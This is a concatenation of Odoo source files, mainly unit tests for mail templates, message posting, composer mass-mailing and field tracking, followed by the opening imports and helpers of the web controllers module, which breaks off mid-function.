'partner_to': '%s,%s' % (self.partner_2.id, self.user_admin.partner_id.id),
'email_to': '%s, %s' % (self.email_1, self.email_2),
'email_cc': '%s' % self.email_3})
# admin should receive emails
self.user_admin.write({'notification_type': 'email'})
@mute_logger('odoo.addons.mail.models.mail_mail')
def test_composer_w_template(self):
composer = self.env['mail.compose.message'].sudo(self.user_employee).with_context({
'default_composition_mode': 'comment',
'default_model': 'mail.test.simple',
'default_res_id': self.test_record.id,
'default_template_id': self.email_template.id,
}).create({'subject': 'Forget me subject', 'body': 'Dummy body'})
# perform onchange and send emails
values = composer.onchange_template_id(self.email_template.id, 'comment', self.test_record._name, self.test_record.id)['value']
composer.write(values)
composer.send_mail()
new_partners = self.env['res.partner'].search([('email', 'in', [self.email_1, self.email_2])])
self.assertEmails(
self.user_employee.partner_id,
[[self.partner_1], [self.partner_2], [new_partners[0]], [new_partners[1]], [self.partner_admin]],
subject=self.test_record.name,
body_content=self.test_record.email_from,
attachments=[('first.txt', b'My first attachment', 'text/plain'), ('second.txt', b'My second attachment', 'text/plain')])
def test_composer_template_onchange_attachments(self):
"""Tests that all attachments are added to the composer,
static attachments are not duplicated and while reports are re-generated,
and that intermediary attachments are dropped."""
composer = self.env['mail.compose.message'].with_context(default_attachment_ids=[]).create({})
report_template = self.env.ref('web.action_report_externalpreview')
template_1 = self.email_template.copy({
'report_template': report_template.id,
})
template_2 = self.email_template.copy({
'attachment_ids': False,
'report_template': report_template.id,
})
onchange_templates = [template_1, template_2, template_1, False]
attachments_onchange = [composer.attachment_ids]
# template_1 has two static attachments and one dynamically generated report,
# template_2 only has the report, so we should get 3, 1, 3 attachments
attachment_numbers = [0, 3, 1, 3, 0]
with self.env.do_in_onchange():
for template in onchange_templates:
onchange = composer.onchange_template_id(
template.id if template else False, 'comment', self.test_record._name, self.test_record.id
)
values = composer._convert_to_record(composer._convert_to_cache(onchange['value']))
attachments_onchange.append(values['attachment_ids'])
composer.update(onchange['value'])
self.assertEqual(
[len(attachments) for attachments in attachments_onchange],
attachment_numbers,
)
self.assertTrue(
len(attachments_onchange[1] & attachments_onchange[3]) == 2,
"The two static attachments on the template should be common to the two onchanges"
)
@mute_logger('odoo.addons.mail.models.mail_mail')
def test_post_post_w_template(self):
self.test_record.sudo(self.user_employee).message_post_with_template(self.email_template.id, composition_mode='comment')
new_partners = self.env['res.partner'].search([('email', 'in', [self.email_1, self.email_2])])
self.assertEmails(
self.user_employee.partner_id,
[[self.partner_1], [self.partner_2], [new_partners[0]], [new_partners[1]], [self.partner_admin]],
subject=self.test_record.name,
body_content=self.test_record.email_from,
attachments=[('first.txt', b'My first attachment', 'text/plain'), ('second.txt', b'My second attachment', 'text/plain')])
@mute_logger('odoo.addons.mail.models.mail_mail')
def test_composer_w_template_mass_mailing(self):
test_record_2 = self.env['mail.test.simple'].with_context(BaseFunctionalTest._test_context).create({'name': 'Test2', 'email_from': '<EMAIL>'})
composer = self.env['mail.compose.message'].sudo(self.user_employee).with_context({
'default_composition_mode': 'mass_mail',
# 'default_notify': True,
'default_notify': False,
'default_model': 'mail.test.simple',
'default_res_id': self.test_record.id,
'default_template_id': self.email_template.id,
'active_ids': [self.test_record.id, test_record_2.id]
}).create({})
values = composer.onchange_template_id(self.email_template.id, 'mass_mail', 'mail.test.simple', self.test_record.id)['value']
composer.write(values)
composer.send_mail()
new_partners = self.env['res.partner'].search([('email', 'in', [self.email_1, self.email_2])])
# hack to use assertEmails
self._mails_record1 = [dict(mail) for mail in self._mails if '%s-%s' % (self.test_record.id, self.test_record._name) in mail['message_id']]
self._mails_record2 = [dict(mail) for mail in self._mails if '%s-%s' % (test_record_2.id, test_record_2._name) in mail['message_id']]
self._mails = self._mails_record1
self.assertEmails(
self.user_employee.partner_id,
[[self.partner_1], [self.partner_2], [new_partners[0]], [new_partners[1]], [self.partner_admin]],
subject=self.test_record.name,
body_content=self.test_record.email_from,
attachments=[('first.txt', b'My first attachment', 'text/plain'), ('second.txt', b'My second attachment', 'text/plain')])
self._mails = self._mails_record2
self.assertEmails(
self.user_employee.partner_id,
[[self.partner_1], [self.partner_2], [new_partners[0]], [new_partners[1]], [self.partner_admin]],
subject=test_record_2.name,
body_content=test_record_2.email_from,
attachments=[('first.txt', b'My first attachment', 'text/plain'), ('second.txt', b'My second attachment', 'text/plain')])
message_1 = self.test_record.message_ids[0]
message_2 = test_record_2.message_ids[0]
# messages effectively posted
self.assertEqual(message_1.subject, self.test_record.name)
self.assertEqual(message_2.subject, test_record_2.name)
self.assertIn(self.test_record.email_from, message_1.body)
self.assertIn(test_record_2.email_from, message_2.body)
def test_composer_template_save(self):
self.env['mail.compose.message'].with_context({
'default_composition_mode': 'comment',
'default_model': 'mail.test.simple',
'default_res_id': self.test_record.id,
}).create({
'subject': 'Forget me subject',
'body': '<p>Dummy body</p>'
}).save_as_template()
# Test: email_template subject, body_html, model
last_template = self.env['mail.template'].search([('model', '=', 'mail.test.simple'), ('subject', '=', 'Forget me subject')], limit=1)
self.assertEqual(last_template.body_html, '<p>Dummy body</p>', 'email_template incorrect body_html')
@mute_logger('odoo.addons.mail.models.mail_mail')
def test_template_send_email(self):
mail_id = self.email_template.send_mail(self.test_record.id)
mail = self.env['mail.mail'].browse(mail_id)
self.assertEqual(mail.subject, self.test_record.name)
self.assertEqual(mail.email_to, self.email_template.email_to)
self.assertEqual(mail.email_cc, self.email_template.email_cc)
self.assertEqual(mail.recipient_ids, self.partner_2 | self.user_admin.partner_id)
def test_template_add_context_action(self):
self.email_template.create_action()
# check template act_window has been updated
self.assertTrue(bool(self.email_template.ref_ir_act_window))
# check those records
action = self.email_template.ref_ir_act_window
self.assertEqual(action.name, 'Send Mail (%s)' % self.email_template.name)
self.assertEqual(action.binding_model_id.model, 'mail.test.simple')
# def test_template_scheduled_date(self):
# from unittest.mock import patch
# self.email_template_in_2_days = self.email_template.copy()
# with patch('odoo.addons.mail.tests.test_mail_template.datetime', wraps=datetime) as mock_datetime:
# mock_datetime.now.return_value = datetime(2017, 11, 15, 11, 30, 28)
# mock_datetime.side_effect = lambda *args, **kw: datetime(*args, **kw)
# self.email_template_in_2_days.write({
# 'scheduled_date': "${(datetime.datetime.now() + relativedelta(days=2)).strftime('%s')}" % DEFAULT_SERVER_DATETIME_FORMAT,
# })
# mail_now_id = self.email_template.send_mail(self.test_record.id)
# mail_in_2_days_id = self.email_template_in_2_days.send_mail(self.test_record.id)
# mail_now = self.env['mail.mail'].browse(mail_now_id)
# mail_in_2_days = self.env['mail.mail'].browse(mail_in_2_days_id)
# # mail preparation
# self.assertEqual(mail_now.exists() | mail_in_2_days.exists(), mail_now | mail_in_2_days)
# self.assertEqual(bool(mail_now.scheduled_date), False)
# self.assertEqual(mail_now.state, 'outgoing')
# self.assertEqual(mail_in_2_days.state, 'outgoing')
# scheduled_date = datetime.strptime(mail_in_2_days.scheduled_date, DEFAULT_SERVER_DATETIME_FORMAT)
# date_in_2_days = datetime.now() + timedelta(days = 2)
# self.assertEqual(scheduled_date, date_in_2_days)
# # self.assertEqual(scheduled_date.month, date_in_2_days.month)
# # self.assertEqual(scheduled_date.year, date_in_2_days.year)
# # Launch the scheduler on the first mail, it should be reported in self.mails
# # and the mail_mail is now deleted
# self.env['mail.mail'].process_email_queue()
# self.assertEqual(mail_now.exists() | mail_in_2_days.exists(), mail_in_2_days)
# # Launch the scheduler on the first mail, it's still in 'outgoing' state
# self.env['mail.mail'].process_email_queue(ids=[mail_in_2_days.id])
# self.assertEqual(mail_in_2_days.state, 'outgoing')
# self.assertEqual(mail_now.exists() | mail_in_2_days.exists(), mail_in_2_days)
def test_create_partner_from_tracking_multicompany(self):
company1 = self.env['res.company'].create({'name': 'company1'})
self.env.user.write({'company_ids': [(4, company1.id, False)]})
self.assertNotEqual(self.env.user.company_id, company1)
email_new_partner = "<EMAIL>"
Partner = self.env['res.partner']
self.assertFalse(Partner.search([('email', '=', email_new_partner)]))
template = self.env['mail.template'].create({
'model_id': self.env['ir.model']._get('mail.test.track').id,
'name': 'AutoTemplate',
'subject': 'autoresponse',
'email_from': self.env.user.email_formatted,
'email_to': "${object.email_from}",
'body_html': "<div>A nice body</div>",
})
def patched_message_track_post_template(*args, **kwargs):
args[0].message_post_with_template(template.id)
return True
with patch('odoo.addons.mail.models.mail_thread.MailThread._message_track_post_template', patched_message_track_post_template):
self.env['mail.test.track'].create({
'email_from': email_new_partner,
'company_id': company1.id,
'user_id': self.env.user.id, # trigger tracking,
})
new_partner = Partner.search([('email', '=', email_new_partner)])
self.assertTrue(new_partner)
self.assertEqual(new_partner.company_id, company1)
def test_composer_template_onchange_attachments(self):
"""Tests that all attachments are added to the composer,
static attachments are not duplicated and while reports are re-generated,
and that intermediary attachments are dropped."""
composer = self.env['mail.compose.message'].with_context(default_attachment_ids=[]).create({})
report_template = self.env.ref('web.action_report_externalpreview')
template_1 = self.email_template.copy({
'report_template': report_template.id,
})
template_2 = self.email_template.copy({
'attachment_ids': False,
'report_template': report_template.id,
})
onchange_templates = [template_1, template_2, template_1, False]
attachments_onchange = [composer.attachment_ids]
# template_1 has two static attachments and one dynamically generated report,
# template_2 only has the report, so we should get 3, 1, 3 attachments
# and when there is no template, no attachments
attachment_numbers = [0, 3, 1, 3, 0]
with self.env.do_in_onchange():
for template in onchange_templates:
onchange = composer.onchange_template_id(
template.id if template else False, 'comment', 'mail.test.simple', self.test_record.id
)
values = composer._convert_to_record(composer._convert_to_cache(onchange['value']))
attachments_onchange.append(values['attachment_ids'])
composer.update(onchange['value'])
self.assertEqual(
[len(attachments) for attachments in attachments_onchange],
attachment_numbers,
)
self.assertTrue(
len(attachments_onchange[1] & attachments_onchange[3]) == 2,
"The two static attachments on the template should be common to the two onchanges"
)
```
#### File: test_mail/tests/test_message_compose.py
```python
import base64
from email.utils import formataddr
from unittest.mock import patch
from odoo.addons.test_mail.tests.common import BaseFunctionalTest, MockEmails, TestRecipients
from odoo.addons.test_mail.tests.common import mail_new_test_user
from odoo.addons.test_mail.data.test_mail_data import MAIL_TEMPLATE_PLAINTEXT
from odoo.addons.test_mail.models.test_mail_models import MailTestSimple
from odoo.exceptions import AccessError
from odoo.tools import mute_logger
class TestMessagePost(BaseFunctionalTest, MockEmails, TestRecipients):
def setUp(self):
super(TestMessagePost, self).setUp()
# configure mailing
self.alias_domain = 'schlouby.fr'
self.alias_catchall = 'test+catchall'
self.env['ir.config_parameter'].set_param('mail.catchall.domain', self.alias_domain)
self.env['ir.config_parameter'].set_param('mail.catchall.alias', self.alias_catchall)
# admin should not receive emails
self.user_admin.write({'notification_type': 'email'})
@mute_logger('odoo.addons.mail.models.mail_mail')
def test_post_notifications(self):
_body, _body_alt, _subject = '<p>Test Body</p>', 'Test Body', 'Test Subject'
# subscribe second employee to the group to test notifications
self.test_record.message_subscribe(partner_ids=[self.user_admin.partner_id.id])
msg = self.test_record.sudo(self.user_employee).message_post(
body=_body, subject=_subject,
message_type='comment', subtype='mt_comment',
partner_ids=[self.partner_1.id, self.partner_2.id]
)
# message content
self.assertEqual(msg.subject, _subject)
self.assertEqual(msg.body, _body)
self.assertEqual(msg.partner_ids, self.partner_1 | self.partner_2)
self.assertEqual(msg.needaction_partner_ids, self.user_admin.partner_id | self.partner_1 | self.partner_2)
self.assertEqual(msg.channel_ids, self.env['mail.channel'])
# notifications emails should have been deleted
self.assertFalse(self.env['mail.mail'].search([('mail_message_id', '=', msg.id)]),
'message_post: mail.mail notifications should have been auto-deleted')
# notification emails
self.assertEmails(
self.user_employee.partner_id,
[[self.partner_1], [self.partner_2], [self.user_admin.partner_id]],
reply_to=msg.reply_to, subject=_subject,
body_content=_body, body_alt_content=_body_alt,
references=False)
@mute_logger('odoo.addons.mail.models.mail_mail')
def test_post_notifications_keep_emails(self):
self.test_record.message_subscribe(partner_ids=[self.user_admin.partner_id.id])
msg = self.test_record.sudo(self.user_employee).message_post(
body='Test', subject='Test',
message_type='comment', subtype='mt_comment',
partner_ids=[self.partner_1.id, self.partner_2.id],
mail_auto_delete=False
)
# notifications emails should not have been deleted: one for customers, one for user
self.assertEqual(len(self.env['mail.mail'].search([('mail_message_id', '=', msg.id)])), 2)
@mute_logger('odoo.addons.mail.models.mail_mail')
def test_post_notifications_emails_tweak(self):
pass
# we should check _notification_groups behavior, for emails and buttons
@mute_logger('odoo.addons.mail.models.mail_mail')
def test_post_attachments(self):
_attachments = [
('List1', b'My first attachment'),
('List2', b'My second attachment')
]
_attach_1 = self.env['ir.attachment'].sudo(self.user_employee).create({
'name': 'Attach1', 'datas_fname': 'Attach1',
'datas': 'bWlncmF0aW9uIHRlc3Q=',
'res_model': 'mail.compose.message', 'res_id': 0})
_attach_2 = self.env['ir.attachment'].sudo(self.user_employee).create({
'name': 'Attach2', 'datas_fname': 'Attach2',
'datas': 'bWlncmF0aW9uIHRlc3Q=',
'res_model': 'mail.compose.message', 'res_id': 0})
msg = self.test_record.sudo(self.user_employee).message_post(
body='Test', subject='Test',
message_type='comment', subtype='mt_comment',
attachment_ids=[_attach_1.id, _attach_2.id],
partner_ids=[self.partner_1.id],
attachments=_attachments,
)
# message attachments
self.assertEqual(len(msg.attachment_ids), 4)
self.assertEqual(set(msg.attachment_ids.mapped('res_model')), set([self.test_record._name]))
self.assertEqual(set(msg.attachment_ids.mapped('res_id')), set([self.test_record.id]))
self.assertEqual(set([base64.b64decode(x) for x in msg.attachment_ids.mapped('datas')]),
set([b'migration test', _attachments[0][1], _attachments[1][1]]))
self.assertTrue(set([_attach_1.id, _attach_2.id]).issubset(msg.attachment_ids.ids),
'message_post: mail.message attachments duplicated')
# notification email attachments
self.assertEmails(self.user_employee.partner_id, [[self.partner_1]])
# self.assertEqual(len(self._mails), 1)
self.assertEqual(len(self._mails[0]['attachments']), 4)
self.assertIn(('List1', b'My first attachment', 'application/octet-stream'), self._mails[0]['attachments'])
self.assertIn(('List2', b'My second attachment', 'application/octet-stream'), self._mails[0]['attachments'])
self.assertIn(('Attach1', b'migration test', 'application/octet-stream'), self._mails[0]['attachments'])
self.assertIn(('Attach2', b'migration test', 'application/octet-stream'), self._mails[0]['attachments'])
@mute_logger('odoo.addons.mail.models.mail_mail')
def test_post_answer(self):
parent_msg = self.test_record.sudo(self.user_employee).message_post(
body='<p>Test</p>', subject='Test Subject',
message_type='comment', subtype='mt_comment')
self.assertEqual(parent_msg.partner_ids, self.env['res.partner'])
self.assertEmails(self.user_employee.partner_id, [])
msg = self.test_record.sudo(self.user_employee).message_post(
body='<p>Test Answer</p>',
message_type='comment', subtype='mt_comment',
partner_ids=[self.partner_1.id],
parent_id=parent_msg.id)
self.assertEqual(msg.parent_id.id, parent_msg.id)
self.assertEqual(msg.partner_ids, self.partner_1)
self.assertEqual(parent_msg.partner_ids, self.env['res.partner'])
# check notification emails: references
self.assertEmails(self.user_employee.partner_id, [[self.partner_1]], ref_content='openerp-%d-mail.test.simple' % self.test_record.id)
# self.assertTrue(all('openerp-%d-mail.test.simple' % self.test_record.id in m['references'] for m in self._mails))
new_msg = self.test_record.sudo(self.user_employee).message_post(
body='<p>Test Answer Bis</p>',
message_type='comment', subtype='mt_comment',
parent_id=msg.id)
self.assertEqual(new_msg.parent_id.id, parent_msg.id, 'message_post: flatten error')
self.assertEqual(new_msg.partner_ids, self.env['res.partner'])
@mute_logger('odoo.addons.mail.models.mail_mail')
def test_post_portal_ok(self):
portal_user = mail_new_test_user(self.env, login='chell', groups='base.group_portal', name='<NAME>')
with patch.object(MailTestSimple, 'check_access_rights', return_value=True):
self.test_record.message_subscribe((self.partner_1 | self.user_employee.partner_id).ids)
new_msg = self.test_record.sudo(portal_user).message_post(
body='<p>Test</p>', subject='Subject',
message_type='comment', subtype='mt_comment')
self.assertEqual(new_msg.sudo().needaction_partner_ids, (self.partner_1 | self.user_employee.partner_id))
self.assertEmails(portal_user.partner_id, [[self.partner_1], [self.user_employee.partner_id]])
def test_post_portal_crash(self):
portal_user = mail_new_test_user(self.env, login='chell', groups='base.group_portal', name='<NAME>')
with self.assertRaises(AccessError):
self.test_record.sudo(portal_user).message_post(
body='<p>Test</p>', subject='Subject',
message_type='comment', subtype='mt_comment')
@mute_logger('odoo.addons.mail.models.mail_mail', 'odoo.addons.mail.models.mail_thread')
def test_post_internal(self):
self.test_record.message_subscribe([self.user_admin.partner_id.id])
msg = self.test_record.sudo(self.user_employee).message_post(
body='My Body', subject='My Subject',
message_type='comment', subtype='mt_note')
self.assertEqual(msg.partner_ids, self.env['res.partner'])
self.assertEqual(msg.needaction_partner_ids, self.env['res.partner'])
self.format_and_process(
MAIL_TEMPLATE_PLAINTEXT,
email_from=self.user_admin.email,
msg_id='<1198923581.41972151344608186800.<EMAIL>>',
to='<EMAIL>',
extra='In-Reply-To:\r\n\t%s\n' % msg.message_id)
reply = self.test_record.message_ids - msg
self.assertTrue(reply)
self.assertEqual(reply.subtype_id, self.env.ref('mail.mt_note'))
self.assertEqual(reply.needaction_partner_ids, self.user_employee.partner_id)
self.assertEqual(reply.parent_id, msg)
def test_post_log(self):
new_note = self.test_record.sudo(self.user_employee)._message_log(
body='<p>Labrador</p>',
)
self.assertEqual(new_note.subtype_id, self.env.ref('mail.mt_note'))
self.assertEqual(new_note.body, '<p>Labrador</p>')
self.assertEqual(new_note.author_id, self.user_employee.partner_id)
self.assertEqual(new_note.email_from, formataddr((self.user_employee.name, self.user_employee.email)))
self.assertEqual(new_note.needaction_partner_ids, self.env['res.partner'])
def test_post_notify(self):
self.user_employee.write({'notification_type': 'inbox'})
new_notification = self.env['mail.thread'].message_notify(
subject='This should be a subject',
body='<p>You have received a notification</p>',
partner_ids=[(4, self.partner_1.id), (4, self.user_employee.partner_id.id)],
)
self.assertEqual(new_notification.subtype_id, self.env.ref('mail.mt_note'))
self.assertEqual(new_notification.body, '<p>You have received a notification</p>')
self.assertEqual(new_notification.author_id, self.env.user.partner_id)
self.assertEqual(new_notification.email_from, formataddr((self.env.user.name, self.env.user.email)))
self.assertEqual(new_notification.needaction_partner_ids, self.partner_1 | self.user_employee.partner_id)
class TestComposer(BaseFunctionalTest, MockEmails, TestRecipients):
def setUp(self):
super(TestComposer, self).setUp()
# configure mailing
self.alias_domain = 'schlouby.fr'
self.alias_catchall = 'test+catchall'
self.env['ir.config_parameter'].set_param('mail.catchall.domain', self.alias_domain)
self.env['ir.config_parameter'].set_param('mail.catchall.alias', self.alias_catchall)
# admin should not receive emails
self.user_admin.write({'notification_type': 'email'})
@mute_logger('odoo.addons.mail.models.mail_mail')
def test_composer_comment(self):
composer = self.env['mail.compose.message'].with_context({
'default_composition_mode': 'comment',
'default_model': self.test_record._name,
'default_res_id': self.test_record.id,
}).sudo(self.user_employee).create({
'body': '<p>Test Body</p>',
'partner_ids': [(4, self.partner_1.id), (4, self.partner_2.id)]
})
composer.send_mail()
message = self.test_record.message_ids[0]
self.assertEqual(message.body, '<p>Test Body</p>')
self.assertEqual(message.author_id, self.user_employee.partner_id)
self.assertEqual(message.subject, 'Re: %s' % self.test_record.name)
self.assertEqual(message.subtype_id, self.env.ref('mail.mt_comment'))
self.assertEqual(message.partner_ids, self.partner_1 | self.partner_2)
@mute_logger('odoo.addons.mail.models.mail_mail')
def test_composer_comment_parent(self):
parent = self.test_record.message_post(body='Test')
self.env['mail.compose.message'].with_context({
'default_composition_mode': 'comment',
'default_parent_id': parent.id
}).sudo(self.user_employee).create({
'body': '<p>Mega</p>',
}).send_mail()
message = self.test_record.message_ids[0]
self.assertEqual(message.body, '<p>Mega</p>')
self.assertEqual(message.parent_id, parent)
@mute_logger('odoo.addons.mail.models.mail_mail')
def test_composer_mass_mail(self):
test_record_2 = self.env['mail.test.simple'].with_context(BaseFunctionalTest._test_context).create({'name': 'Test2'})
composer = self.env['mail.compose.message'].with_context({
'default_composition_mode': 'mass_mail',
'default_model': self.test_record._name,
'default_res_id': False,
'active_ids': [self.test_record.id, test_record_2.id]
}).sudo(self.user_employee).create({
'subject': 'Testing ${object.name}',
'body': '<p>${object.name}</p>',
'partner_ids': [(4, self.partner_1.id), (4, self.partner_2.id)]
})
composer.with_context({
'default_res_id': -1,
'active_ids': [self.test_record.id, test_record_2.id]
}).send_mail()
# check mail_mail
mails = self.env['mail.mail'].search([('subject', 'ilike', 'Testing')])
for mail in mails:
self.assertEqual(mail.recipient_ids, self.partner_1 | self.partner_2,
'compose wizard: mail_mail mass mailing: mail.mail in mass mail incorrect recipients')
# check message on test_record
message1 = self.test_record.message_ids[0]
self.assertEqual(message1.subject, 'Testing %s' % self.test_record.name)
self.assertEqual(message1.body, '<p>%s</p>' % self.test_record.name)
# check message on test_record_2
message1 = test_record_2.message_ids[0]
self.assertEqual(message1.subject, 'Testing %s' % test_record_2.name)
self.assertEqual(message1.body, '<p>%s</p>' % test_record_2.name)
@mute_logger('odoo.addons.mail.models.mail_mail')
def test_composer_mass_mail_active_domain(self):
test_record_2 = self.env['mail.test.simple'].with_context(BaseFunctionalTest._test_context).create({'name': 'Test2'})
self.env['mail.compose.message'].with_context({
'default_composition_mode': 'mass_mail',
'default_model': self.test_record._name,
'default_use_active_domain': True,
'active_ids': [self.test_record.id],
'active_domain': [('name', 'in', ['%s' % self.test_record.name, '%s' % test_record_2.name])],
}).sudo(self.user_employee).create({
'subject': 'From Composer Test',
'body': '${object.name}',
}).send_mail()
self.assertEqual(self.test_record.message_ids[0].subject, 'From Composer Test')
self.assertEqual(test_record_2.message_ids[0].subject, 'From Composer Test')
@mute_logger('odoo.addons.mail.models.mail_mail')
def test_message_compose_mass_mail_no_active_domain(self):
test_record_2 = self.env['mail.test.simple'].with_context(BaseFunctionalTest._test_context).create({'name': 'Test2'})
self.env['mail.compose.message'].with_context({
'default_composition_mode': 'mass_mail',
'default_model': self.test_record._name,
'default_use_active_domain': False,
'active_ids': [self.test_record.id],
'active_domain': [('name', 'in', ['%s' % self.test_record.name, '%s' % test_record_2.name])],
}).sudo(self.user_employee).create({
'subject': 'From Composer Test',
'body': '${object.name}',
}).send_mail()
self.assertEqual(self.test_record.message_ids[0].subject, 'From Composer Test')
self.assertFalse(test_record_2.message_ids.ids)
@mute_logger('odoo.addons.mail.models.mail_mail')
def test_message_compose_portal_ok(self):
portal_user = mail_new_test_user(self.env, login='chell', groups='base.group_portal', name='Chell Gladys')
with patch.object(MailTestSimple, 'check_access_rights', return_value=True):
ComposerPortal = self.env['mail.compose.message'].sudo(portal_user)
ComposerPortal.with_context({
'default_composition_mode': 'comment',
'default_model': self.test_record._name,
'default_res_id': self.test_record.id,
}).create({
'subject': 'Subject',
'body': '<p>Body text</p>',
'partner_ids': []}).send_mail()
self.assertEqual(self.test_record.message_ids[0].body, '<p>Body text</p>')
self.assertEqual(self.test_record.message_ids[0].author_id, portal_user.partner_id)
ComposerPortal.with_context({
'default_composition_mode': 'comment',
'default_parent_id': self.test_record.message_ids.ids[0],
}).create({
'subject': 'Subject',
'body': '<p>Body text 2</p>'}).send_mail()
self.assertEqual(self.test_record.message_ids[0].body, '<p>Body text 2</p>')
self.assertEqual(self.test_record.message_ids[0].author_id, portal_user.partner_id)
```
#### File: test_mail/tests/test_message_track.py
```python
from email.utils import formataddr
from odoo.addons.test_mail.tests import common
class TestTracking(common.BaseFunctionalTest, common.MockEmails):
def assertTracking(self, message, data):
tracking_values = message.sudo().tracking_value_ids
for field_name, value_type, old_value, new_value in data:
tracking = tracking_values.filtered(lambda track: track.field == field_name)
self.assertEqual(len(tracking), 1)
if value_type in ('char', 'integer'):
self.assertEqual(tracking.old_value_char, old_value)
self.assertEqual(tracking.new_value_char, new_value)
elif value_type in ('many2one'):
self.assertEqual(tracking.old_value_integer, old_value and old_value.id or False)
self.assertEqual(tracking.new_value_integer, new_value and new_value.id or False)
self.assertEqual(tracking.old_value_char, old_value and old_value.name_get()[0][1] or '')
self.assertEqual(tracking.new_value_char, new_value and new_value.name_get()[0][1] or '')
else:
self.assertEqual(1, 0)
def setUp(self):
super(TestTracking, self).setUp()
record = self.env['mail.test.full'].sudo(self.user_employee).with_context(common.BaseFunctionalTest._test_context).create({
'name': 'Test',
})
self.record = record.with_context(mail_notrack=False)
def test_message_track_no_tracking(self):
""" Update a set of non tracked fields -> no message, no tracking """
self.record.write({
'name': 'Tracking or not',
'count': 32,
})
self.assertEqual(self.record.message_ids, self.env['mail.message'])
def test_message_track_no_subtype(self):
""" Update some tracked fields not linked to some subtype -> message with onchange """
customer = self.env['res.partner'].create({'name': 'Customer', 'email': '<EMAIL>'})
self.record.write({
'name': 'Test2',
'customer_id': customer.id,
})
# one new message containing tracking; without subtype linked to tracking, a note is generated
self.assertEqual(len(self.record.message_ids), 1)
self.assertEqual(self.record.message_ids.subtype_id, self.env.ref('mail.mt_note'))
# no specific recipients except those following notes, no email
self.assertEqual(self.record.message_ids.partner_ids, self.env['res.partner'])
self.assertEqual(self.record.message_ids.needaction_partner_ids, self.env['res.partner'])
self.assertEqual(self._mails, [])
# verify tracked value
self.assertTracking(
self.record.message_ids,
[('customer_id', 'many2one', False, customer) # onchange tracked field
])
def test_message_track_subtype(self):
""" Update some tracked fields linked to some subtype -> message with onchange """
self.record.message_subscribe(
partner_ids=[self.user_admin.partner_id.id],
subtype_ids=[self.env.ref('test_mail.st_mail_test_full_umbrella_upd').id]
)
umbrella = self.env['mail.test'].with_context(mail_create_nosubscribe=True).create({'name': 'Umbrella'})
self.record.write({
'name': 'Test2',
'email_from': '<EMAIL>',
'umbrella_id': umbrella.id,
})
# one new message containing tracking; subtype linked to tracking
self.assertEqual(len(self.record.message_ids), 1)
self.assertEqual(self.record.message_ids.subtype_id, self.env.ref('test_mail.st_mail_test_full_umbrella_upd'))
# no specific recipients except those following umbrella
self.assertEqual(self.record.message_ids.partner_ids, self.env['res.partner'])
self.assertEqual(self.record.message_ids.needaction_partner_ids, self.user_admin.partner_id)
# verify tracked value
self.assertTracking(
self.record.message_ids,
[('umbrella_id', 'many2one', False, umbrella) # onchange tracked field
])
def test_message_track_template(self):
""" Update some tracked fields linked to some template -> message with onchange """
self.record.write({'mail_template': self.env.ref('test_mail.mail_test_full_tracking_tpl').id})
self.assertEqual(self.record.message_ids, self.env['mail.message'])
self.record.write({
'name': 'Test2',
'customer_id': self.user_admin.partner_id.id,
})
self.assertEqual(len(self.record.message_ids), 2, 'should have 2 new messages: one for tracking, one for template')
# one new message containing the template linked to tracking
self.assertEqual(self.record.message_ids[0].subject, 'Test Template')
self.assertEqual(self.record.message_ids[0].body, '<p>Hello Test2</p>')
# one email send due to template
self.assertEqual(len(self._mails), 1)
self.assertEqual(set(self._mails[0]['email_to']), set([formataddr((self.user_admin.name, self.user_admin.email))]))
self.assertHtmlEqual(self._mails[0]['body'], '<p>Hello Test2</p>')
# one new message containing tracking; without subtype linked to tracking
self.assertEqual(self.record.message_ids[1].subtype_id, self.env.ref('mail.mt_note'))
self.assertTracking(
self.record.message_ids[1],
[('customer_id', 'many2one', False, self.user_admin.partner_id) # onchange tracked field
])
def test_message_track_sequence(self):
""" Update some tracked fields and check that the mail.tracking.value are ordered according to their track_sequence"""
self.record.write({
'name': 'Zboub',
'customer_id': self.user_admin.partner_id.id,
'user_id': self.user_admin.id,
'umbrella_id': self.env['mail.test'].with_context(mail_create_nosubscribe=True).create({'name': 'Umbrella'}).id
})
self.assertEqual(len(self.record.message_ids), 1, 'should have 1 tracking message')
tracking_values = self.env['mail.tracking.value'].search([('mail_message_id', '=', self.record.message_ids.id)])
self.assertEqual(tracking_values[0].track_sequence, 1)
self.assertEqual(tracking_values[1].track_sequence, 2)
self.assertEqual(tracking_values[2].track_sequence, 100)
```
#### File: web/controllers/main.py
```python
import babel.messages.pofile
import base64
import datetime
import functools
import glob
import hashlib
import imghdr
import io
import itertools
import jinja2
import json
import logging
import operator
import os
import re
import sys
import tempfile
import time
import zlib
import werkzeug
import werkzeug.exceptions
import werkzeug.utils
import werkzeug.wrappers
import werkzeug.wsgi
from collections import OrderedDict
from werkzeug.urls import url_decode, iri_to_uri
from xml.etree import ElementTree
import unicodedata
import odoo
import odoo.modules.registry
from odoo.api import call_kw, Environment
from odoo.modules import get_resource_path
from odoo.tools import crop_image, topological_sort, html_escape, pycompat
from odoo.tools.mimetypes import guess_mimetype
from odoo.tools.translate import _
from odoo.tools.misc import str2bool, xlwt, file_open
from odoo.tools.safe_eval import safe_eval
from odoo import http
from odoo.http import content_disposition, dispatch_rpc, request, \
serialize_exception as _serialize_exception, Response
from odoo.exceptions import AccessError, UserError, AccessDenied
from odoo.models import check_method_name
from odoo.service import db, security
_logger = logging.getLogger(__name__)
if hasattr(sys, 'frozen'):
# When running on compiled windows binary, we don't have access to package loader.
path = os.path.realpath(os.path.join(os.path.dirname(__file__), '..', 'views'))
loader = jinja2.FileSystemLoader(path)
else:
loader = jinja2.PackageLoader('odoo.addons.web', "views")
env = jinja2.Environment(loader=loader, autoescape=True)
env.filters["json"] = json.dumps
# 1 week cache for asset bundles as advised by Google Page Speed
BUNDLE_MAXAGE = 60 * 60 * 24 * 7
DBNAME_PATTERN = '^[a-zA-Z0-9][a-zA-Z0-9_.-]+$'
#----------------------------------------------------------
# Odoo Web helpers
#----------------------------------------------------------
db_list = http.db_list
db_monodb = http.db_monodb
def serialize_exception(f):
@functools.wraps(f)
def wrap(*args, **kwargs):
try:
return f(*args, **kwargs)
except Exception as e:
_logger.exception("An exception occured during an http request")
se = _serialize_exception(e)
error = {
'code': 200,
'message': "Odoo Server Error",
'data': se
}
return werkzeug.exceptions.InternalServerError(json.dumps(error))
return wrap
def redirect_with_hash(*args, **kw):
"""
.. deprecated:: 8.0
Use the ``http.redirect_with_hash()`` function instead.
"""
return http.redirect_with_hash(*args, **kw)
def abort_and_redirect(url):
r = request.httprequest
response = werkzeug.utils.redirect(url, 302)
